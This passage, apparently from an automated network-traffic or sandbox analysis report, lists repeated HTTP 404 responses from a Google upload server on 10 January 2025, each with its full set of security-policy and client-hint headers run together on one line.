https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC647X2r8U-MTu2n4aPvSdUj3TCScGugC88GXg6g6TgO7vQSPHRs5P0o7lRdkqZFrbGkphzD0tYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:33:38 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-dqRnQ96kB8Cx8gWsNVQXJQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6arl5y70PQyRDrWNpMytZQSp4tzis-6_R2Kwf-yQJ2dC7eUDn8WCfRwRAe5XX_M7xNYxa-nI4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:33:49 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-3X_gkwWtI59K738p9N7fqA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4ptTXBTBoCC7JBURVujK9C_kF1AF1JEv7GN8u5sT4ycQ-vETjaPrWByA3vdk1bNm5NwTMDXVcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:34:00 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-qk5CtqYNXSJCBebOjSD41Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4owAQ-rszhPRwGVnM8A0PHGiS_Wsxrq_Fg_ROtqV0ttHRoZRbUHzeLJRoGMtMwRS3wContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:34:11 GMTContent-Security-Policy: script-src 'nonce-gZFSwUHLrUXlEHG4bMp8jA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC56mYfJx7SXF7l10xCPbmiRpR_TcfO8qEGS9TjRAycG4fby3BcR9NAJkDYTbWEOI18yContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:34:23 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-M1v3c6y7Ku6SLrIGidpNMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6b4nxUtM48yAR1ZBuO4biwPKd3tdXouRKAbMVj5U55tuVtehXX0n9i9EMGa5n3JYYjCIQYP2sContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:34:34 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-WfPEWujkleLhr6wVvKm7zg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6rviVyHLoy3-nG-CuXrfbQ6P8mnMuGlGZlbHpw-j6LDAFi7V9gZTiMcmzg9jazfgSibDpSIBEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:34:45 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-1oCRabKA1pxrLDpkYjV2mA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC45-i7YH9HgbwTZoFCrGyKRyVgEQlrBnLxE2vDMWXYSEBg3Dsfmtht0qa1UYFa0f-E2Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:34:57 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-SJ7dBqLYgQFCMsI7lb0qgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7X79WSwMnVC6Dk6SezQM-LvXn1WZhUNpqNpv9HB60POcagnGdD8CIdlMJkzbopNMRYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:35:11 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-XuSKyxWzvXdaWTilRNBcJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQXtUEJZf4C4gkDCXKnFkydjwwQWKm1nceswqeqLOCI1hznQIp0uNPXdYf66dRviP6W_e-E86AContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:35:22 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-X86PfESf03BrET8MPkZ54A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4XBvI73cbfhFTD7NKIHyRefins8Nh-tMwIvGsVOJMNJUm46jRX1TkZlVl8aIjOUN2E_lnlG5oContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:35:33 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-QtfbGDAh5BauZHnw-osd9g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSJS6KD6gxCzrqqBeRy24CousGyYUM_mZdjcRvC4T79YGmFUkvXV5do_CUI5_pjniO7uZ7cyG4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:35:44 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-0PzhdXXu0uPuUoB_l9032w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7MGSCM-SqO8QIqqKWY3qJxCkHxZcO5bdMP9oMniQH9Cu54DdZ51K_0TXxSih3FWwrqHwnqwTgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:35:56 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-cf6_GHo-5Pu2mtyymmWuuA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTPSAVtfR4XjmO_v3WA6bPvV6XjRtUcKAea1tg9dsK3ECRk2pI-yjq12m49LcgZdGyNContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:36:07 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-khC-4aYosW-NtjAkFBbzkA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
